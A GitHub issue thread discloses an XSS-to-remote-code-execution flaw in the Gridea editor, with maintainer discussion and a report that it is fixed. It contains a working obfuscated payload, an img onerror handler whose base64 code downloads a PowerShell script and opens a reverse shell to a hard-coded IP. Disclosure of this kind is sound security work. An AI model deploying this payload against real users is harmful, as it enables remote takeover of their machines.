Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability: XSS to RCE #105

Closed
0x2E opened this issue May 13, 2019 · 4 comments
Closed

Vulnerability: XSS to RCE #105

0x2E opened this issue May 13, 2019 · 4 comments

Comments

@0x2E
Copy link

0x2E commented May 13, 2019

Hi, I found an XSS vulnerability that can cause RCE.
And I recorded a GIF to demonstrate controlling the local win10 through this vulnerability.

Cause of vulnerability

The post content editing area does not filter or prevent the running of js script, resulting in the use of XSS to call Nodejs module ( for example: child_process.exec() ) to achieve arbitrary code execution. If the user imports content containing malicious code, the vulnerability will be triggered.

Payload

<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoInBvd2Vyc2hlbGwgSUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vc2FtcmF0YXNob2svbmlzaGFuZy85YTNjNzQ3YmNmNTM1ZWY4MmRjNGM1YzY2YWFjMzZkYjQ3YzJhZmRlL1NoZWxscy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEnKTtJbnZva2UtUG93ZXJTaGVsbFRjcCAtUmV2ZXJzZSAtSVBBZGRyZXNzIDE5Mi4xNjguMjIxLjY2IC1wb3J0IDk5OTkiLChlcnIsIHN0ZG91dCwgc3RkZXJyKT0+ewogIGlmIChlcnIpIHsKICAgIGNvbnNvbGUuZXJyb3IoZXJyKTsKICAgIHJldHVybjsKICB9CiAgY29uc29sZS5sb2coc3Rkb3V0KTsKfSk7`,`base64`).toString())'>
@EryouHao
Copy link
Member

EryouHao commented May 14, 2019

In this regard, I think the users of Gridea are users themselves, and the content written by Markdown in the article is also written by users themselves. therefore, most users know what they are writing and will not attack themselves, will they?

Please correct me if my understanding is wrong.

@0x2E
Copy link
Author

0x2E commented May 14, 2019

You are right, users do not attack themselves actively, so the probability of using this vulnerability is low.

My hypothetical scenario is that when a user is inadvertently or induced to include malicious code in the editor (such as a reference to someone else's article), they may not notice the malicious code in their content and easily try to preview it, then I've executed the code I need on their OS.

@muze-page
Copy link

不无可能

@EryouHao
Copy link
Member

fixed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants